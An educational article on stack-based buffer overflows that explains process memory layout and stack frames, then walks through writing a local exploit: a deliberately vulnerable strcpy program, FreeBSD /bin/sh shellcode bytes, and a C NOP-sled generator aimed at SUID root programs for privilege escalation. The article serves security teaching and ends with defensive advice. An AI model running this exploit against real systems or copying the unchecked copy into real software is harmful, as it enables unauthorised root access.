Title: Buffer Overflow
Author: SpyHat
1. Executive Summary:
Over the last few years there has been a large increase of buffer overflow vulnerabilities being both discovered and exploited. Examples of these are syslog, splitvt, sendmail 8.7.5, Linux / FreeBSD mount, Code Red and the Morris worm, which was the first virus to use buffer overflows in 1988. This article attempts to explain what buffer overflows are, and how their exploits work.
2. Introduction:
“Buffer overflows are perhaps the most notorious and widely publicized attacks. These are complex attacks that exploit the fundamental hardware and software capabilities of a system.”
A Buffer overflow attack is done by deliberately entering more data than a program was written to handle. Buffer overflow attacks exploit a lack of boundary checking on the size of input being stored in a buffer. The extra data will overflow the memory set aside to accept it and overwrite another region of memory that was meant to hold some of the program's instructions. The result of this is a cascade, which can eventually halt the application or the system it is running on. The newly introduction values can be new instructions, which could give the attacker control of the target machine depending on what was input. For example when we write a string of size 20 into a variable of size 10. The result is that we write data into a portion of memory that dose not belong to the original variable, which can have unpredictable results. Another example, in one of Microsoft Software, if a hacker sends an email to a Microsoft Outlook user using an address that is longer than 256 characters; the hacker will force the buffer to overflow. The recipient wouldn't even have to open the e-mail for this type of attack to be successful; the attack is successful as soon as the message is downloading from the server. Microsoft quickly released a patch for this issue after it was discovered in October 2000.
3. Process Memory Organization:
To understand what stack buffers are we must first understand how a process is organized in memory. The computer system has a pool of Random Access Memory (RAM) organized into small chunks by the operating system that runs applications. In order to share this memory among the operating system's many processes and applications, special memory coordinates that chunks of the RAM pool are in use and which are available to run an application. When an application is first run, memory is allocated for the application and all of its functions and variables. Furthermore, RAM is considered "random access" because you can access any memory cell directly if you know the row and column that intersect at that cell. The opposite of RAM is serial access memory (SAM). SAM stores data as a series of memory cells that can only be accessed sequentially (like a cassette tape). If the data is not in the current location, each memory cell is checked until the needed data is found. SAM works very well for memory buffers, where the data is normally stored in the order it will be used. A good example is the texture buffer memory on a video card.
As the application runs, more memory can be allocated for new variables and de-allocated when no longer in use. A buffer is a reserved area of memory for temporarily holding data. A buffer can hold data being sent from a high-speed device to a low-speed device until the slower device can accept the input; for example, to hold data sent to a printer until the printer is ready for it. Different buffer can and often exist side-by-side in memory. A buffer that holds a variable can exist next to a piece of memory that holds a function or another application.
Processes are divided into three regions in the memory: Text, Data, and Stack as shown in figure 1. We will concentrate on the stack region, but first a small overview of the other regions is in order.
The text region is fixed by the program and includes code (instructions) and read only data. This region corresponds to the text section of the executable file. This region is normally marked read-only and any attempt to write to it will result in a segmentation violation.
The data region contains initialized and uninitialized data. Static variables are stored in this region. The data region corresponds to the data-bss sections of the executable file.

Fig. 1 Process Memory Regions
4. The Stack Region:
Stack is an abstract data type frequently used in computer science. A stack of objects has the property that the last object placed on the stack will be the first object removed. This property is commonly referred to as last in, first out queue, or a LIFO.
Several operations are defined on stacks. Two of the most important are PUSH and POP. PUSH adds an element at the top of the stack. POP, in contrast, reduces the stack size by one by removing the last element at the top of the stack.
Modern computers are designed with the need of high-level languages in mind. The most important technique for structuring programs introduced by high-level languages is the procedure or function. From one point of view, a procedure call alters the flow of control just as a jump does, but unlike a jump, when finished performing its task, a function returns control to the statement or instruction following the call. This high-level abstraction is implemented with the help of the stack.
The stack is also used to dynamically allocate the local variables used in functions, to pass parameters to the functions, and to return values from the function.
A stack is a contiguous block of memory containing data. A register called the stack pointer (SP) points to the top of the stack. The bottom of the stack is at a fixed address. Its size is dynamically adjusted by the kernel at run time. The CPU implements instructions to PUSH onto and POP off of the stack.
The stack consists of logical stack frames that are pushed when calling a function and popped when returning. A stack frame contains the parameters to a function, its local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call.
Depending on the implementation the stack will either grow down (towards lower memory addresses), or up. This is the way the stack grows on many computers including the Intel, Motorola, SPARC and MIPS processors. The stack pointer (SP) is also implementation dependent. It may point to the last address on the stack or to the next free available address after the stack.
In addition to the stack pointer, which points to the top of the stack (lowest numerical address), it is often convenient to have a frame pointer (FP) which points to a fixed location within a frame. Some books also refer to it as a local base pointer (LB). In principle, giving their offsets from SP could reference local variables. However, as words are pushed onto the stack and popped from the stack, these offsets change. Although in some cases the compiler can keep track of the number of words on the stack and thus correct the offsets, in some cases it cannot, and in all cases considerable administration is required. Furthermore, on some machines, such as Intel-based processors, accessing a variable at a known distance from SP requires multiple instructions.
Consequently, many compilers use a second register, FP, for referencing both local variables and parameters because their distances from FP do not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this purpose. On the Motorola CPUs, any address register except A7 (the stack pointer) will do. Because the way our stack grows, actual parameters have positive offsets and local variables have negative offsets from FP.
The first thing a procedure must do when called is save the previous FP (so it can be restored at procedure exit). Then it copies SP into FP to create the new FP, and advances SP to reserve space for the local variables. This code is called the procedure prolog. Upon procedure exit, the stack must be cleaned up again, something called the procedure epilog. The Intel ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, have been provided to do most of the procedure prolog and epilog work efficiently.
4.1.Stack Frame:
Let us see what the stack looks like in a simple example:
4.1.1. Example1.c:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
}
void main() {
function(1,2,3);
}
To understand what the program does to call function() we compile it with gcc using the -S switch to generate assembly code output:
$ gcc -S -o example1.s example1.c
By looking at the assembly language output we see that the call to function() is translated to:
pushl $3
pushl $2
pushl $1
call function
This pushes the 3 arguments to function backwards into the stack, and calls function(). The instruction 'call' will push the instruction pointer (IP) onto the stack. We'll call the saved IP the return address (RET). The first thing done in function is the procedure prolog:
pushl %ebp
movl %esp,%ebp
subl $20,%esp
This pushes EBP, the frame pointer, onto the stack. It then copies the current SP onto EBP, making it the new FP pointer. We'll call the saved FP pointer SFP. It then allocates space for the local variables by subtracting their size from SP.
We must remember that memory can only be addressed in multiples of the word size. A word in our case is 4 bytes, or 32 bits. So our 5-byte buffer is really going to take 8 bytes (2 words) of memory, and our 10-byte buffer is going to take 12 bytes (3 words) of memory. That is why SP is being subtracted by 20. With that in mind our stack looks like this when function() is called (each space represents a byte) as shown in figure 2.

Fig. 2 Stack Frame
5. Buffer Overflows:
When a program receives more data than what it expected and is not programmed to cope with such situations, the extra data will be put in memory, probably overwriting other internal structures of a program. A well-crafted buffer overflow can lead the attacked program to execute arbitrary code, possibly giving the attacker complete control over the computer.
To show you how the buffer overflow works, we will use a simple example program. First we declare two 4 byte buffers, buf and buf2. Then we make sure that the first buffer “buf” is empty. Then we print the content of buf. Then we use string copy to copy the first argument to the second buffer; buf2 and then the program will print the content of buf after the string copy. Note that string copy is not copying anything to the first buffer, buf.
5.1. Example2.c:
main(int argc, char **argv)
{
char buf1[4];
char buf2[4];
memset(buf1,0,sizeof(buf1));
printf("Before strcpy buf1=%s\n",buf1);
strcpy(buf2,argv[1]);
printf("After strcpy buf1=%s\n",buf1);
}
5.2. Example2 Output 1:
First we will try running the program with the argument “1234” which is 4 bytes. We get the expected output; buf is still empty after the strcpy. As you can clearly see, 4 bytes will fill the buffer buf2 but it will not affect the buffer buf. Figure 3 will show the example output, and figure 4 will show the stake frame for it.

Fig. 3 Example2 Output 1

Fig. 4 Stack Frame for Example2 Output 1
5.3. Example2 Output 2:
Let's see what will happen when we try to copy 8 bytes into the buffer buf2, the first 4 bytes fits but the remaining 4 bytes will be copied to the buffer buf. The output after the string copy is 5678. Buf2 has been overflowed and buf has been overwritten. Figure 5 will show the example output, and figure 6 will show the stake frame for it.

Fig. 5 Example2 Output 2

Fig. 6 Stack Frame for Example2 Output 2
5.4 Example2 Output 3:
This time we are trying to copy even more data into buf2, buf and buf2 are not large enough to hold it so both EBP and EIP will be overwritten. The total size of buf and buf2 is 8 bytes, EBP is 4 bytes, EIP is 4 bytes, so byte 13 to byte 16 will be the new EIP. This means that we have changed the return address that is why this program crashes with a segmentation fault. Figure 7 will show the example output, and figure 8 will show the stake frame for it.

Fig. 7 Example2 Output 3

Fig. 8 Stack Frame for Example2 Output 3
6. Building an exploit:
We will now proceed by showing you how to write an exploit. First we create a vulnerable program. Then we will show you how to find the EIP. After that, we will see how to use the shellcode and where to return. Then, we will see why and how to use NOPs. Then we find a good place to return writing the exploit, using C. Finally, there is testing the exploit, to see that if it works the way we hoped.
6.1. Vulnerable program:
This is our vulnerable program; it will copy the first argument given to it into a local buffer. The buffer buf is defined, and it is 512 bytes. Then the program will string copy the argument to the buffer.
int main(int argc, char **argv)
{
char buf[512];
strcpy(buf,argv[1]);
}
6.2. Finding the EIP:
Finding the EIP in this case is very easy, since we know the source code. It's simple math, we know that buf is 512 bytes and that EBP is 4 bytes.512 plus 4 equals 516, which means that byte 517 to byte 520 is the EIP, this is the return address. As shown in figure 9.

Fig. 9 Stack Frame for Vulnerable program
6.3. Where to Return:
We can disassemble the executable and look at the code, run it through a debugger and get the addresses of the variables on the stack. Or we could use the stack pointer and calculate offsets. Also we could even create shell environment variables, try to read them in the exploit and get their addresses. Moreover, there are a number of other ways to find the EIP.
It is not an easy task finding the exact place for the vulnerable program, so our exploit starts is very important. The exploit won't work if we get it wrong, most likely the program will crash. We can improve our chances of finding the correct place by using NOPs, which will be described later in the article. As shown in figure 10.

Fig. 10 Stack Frame and Return Address
6.4. Shellcode:
So now that we know that we can modify the return address and the flow of execution, what program do we want to execute? In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish. But what if there is no such code in the program we are trying to exploit? How can we place arbitrary instruction into its address space? The answer is to place the code, which we are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer.
Since we write the shell code directly into the computer memory, therefore the CPU should interpret it. The shellcode must be directly understandable by the machine. We cannot write it in C, the shellcode has to be in assembly language converted into byte codes. The shellcode are not humanly readable and OS and application dependant.
When shellcode, we have to be very careful, there are some codes that we cannot use, such as NULL. In our vulnerable program, we will try an exploit a C string copy function, string copy will terminate if it detects a NULL character, this will stop the exploit code from copying correctly into memory.
6.5. Using Shellcode:
As it shows in figure 11 we will have to copy the shellcode to the buffer, since that is what we want to be executed. The operative system we are using is FreeBSD so we will use a FreeBSD shellcode. The shellcode we are using will execute /bin/sh, this will spawn a shell.

Fig. 11 Stack Frame and ShellCode
6.6. Using NOP:
Now the shellcode is in the memory, the EIP has to be modified to point to back to shellcode, as we have seen this is not an exact science so, we need to use NOPs. As it show in figure 12.
A NOP is machine code instruction that doses nothing, the computer simply moves onto the next instruction; this property is very useful to use. By placing NOPs before the shellcode in memory we now no longer have to find the exact address, the exact byte to return to we return back somewhere in the area where the NOPs are. The computer will just advance through the NOPs when it reaches the shellcode it will execute it. So we will improve our chances to get the machine to run our exploit.

Fig. 12 Using NOP
6.7. Writing the exploit:
Let's try to pull all our pieces together. We have the shellcode. We know it must be part of the string, which we'll use to overflow the buffer. We know we must point the return address back into the buffer.
As we have seen the shell code is not humanly readable, we don't want to type the shellcode in each time on the command line, especially as it probably won't work the first time, so we write a program that will generate the argument to the vulnerable program. As it show in figure 13.
Exploit.c:
#define SHELL "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b" \
"\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53" \
"\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff" \
"/bin/sh"
main (int argc, char **argv)
{
int i;
for (i=0;i<479;i++)
printf("%c",0x90);
printf("%s\xfb\xfb\xbf\xbf",SHELL);
}

Fig. 13 Stack Frame
What we have done above is printing 479 NOPs; the NOP in this case is 90 in Hexadecimal. Then we copy our shellcode. Finally we print the new EIP, which is 0xbfbffbfb in this case. Overwriting it with the address where our code is now located. Once we reach the end of main and it tried to return it jumps to our code and execs a shell.
6.8. Running the Exploit:
Before we run the exploit to see what it dose let's talk about why we would want to write an exploit to create a shell. In the Unix operating system every user has certain privileges. Ordinary users cannot run certain programs or access certain areas of the system. Access to these areas if required by normal users is allowed through the use of programs, which run with the privileges of the owner of the program. The SUID bit of the privileges is set on. If a normal run a SUID program, which is, owned by root the program runs the privileges of root. If we can exploit one of these programs to create a shell then the shell created will have the privileges of root; the entire system is then open to us. As shown in figure 14.

Fig. 14 Running the Exploit
7. Conclusion:
Security analysts agree that the first step in cutting down on buffer overflow bugs is for people to engage in more careful computer programming. Programmers can protect their products against buffer overflow attacks simply by including instructions for handling overlong strings
Most high-level programming languages are essentially immunes to this problem, either because they automatically resize arrays (e.g., Perl), or because they normally detect and prevent buffer overflows (e.g., Ada95). However, the C language provides no protection against such problems, and C++ can be easily used in ways to cause this problem too. Assembly language also provides no protection, and some languages that normally include such protection (e.g., Ada and Pascal) can have this protection disabled (for performance reasons). Even if most of your program is written in another language, many library routines are written in C or C++, as well as ``glue'' code to call them, so other languages often don't provide as complete a protection from buffer overflows as you'd like.
Perhaps buffer overflow attacks are becoming boring to security professionals, who know how that they can be prevented? And what can you do? Run the minimum number of services, disable automatic execution of software upon the receipt of e-mail, do not blindly start up software such as NetMeeting, and install security patches as soon as possible. Perhaps you will be lucky enough to be bored about security as well.
8. Reference:
·Aleph One, Smashing The Stack For Fun And Profit, Phrack Magazine 49, Fall 1997 , Available Online:
http://community.core-sdi.com/~juliano/smashing/P49-4-Smashing_the_stack.txt
·Anonymous, 2001, Maximum Security, Third Edition, Chapter 29, SAMS, 201 West 103 rd St., Indianapolis, Indiana, 46290, USA
(2000, D) DilDog, 2000, The Tao of Windows Buffer Overflow, Available Online:
http://www.cultdeadcow.com/cDc_files/cDc-351/index.html
(2000, E. H) Eddie Harari, 2000, A Look at the Buffer-Overflow Hack, Available Online:
http://www2.linuxjournal.com/lj-issues/issue61/2902.html
(2001, F T) Jeff Forristal Julie Traxler, 2001, Hacking Proofing Your Web Application, Syngress Publishing , Inc., 800 Hingham street, Rockland, MA 02370, USA
·(1995, M) Mudge , 1995, How to write Buffer Overflows, Available Online:
http://www.atstake.com/research/reports/index.html
|